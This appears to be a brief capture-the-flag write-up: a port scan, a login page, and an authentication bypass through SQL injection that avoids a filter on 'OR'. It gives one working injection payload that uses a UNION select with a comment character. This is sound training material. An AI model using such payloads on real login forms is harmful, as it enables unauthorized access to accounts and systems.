Scanning
We scan the open ports with the nmap tool, scripts and software versions:
Enumeration
We access the website and we can see a authentication:
We can testing with guessing password, but not working:
We try with login Bypass techniques, we see a SQL Injection protection with "OR" characters, the error message suggests us a "hint" to use techniques that does not require "OR", so we are on the right track...
We find to Tib3rius in Twitter, he has post with mentions about to SQL Injection and not uses "OR" parameter:
Exploitation
We try different payloads, we use 1' union select ''# , we successfully to bypass the authentication and we see the flag: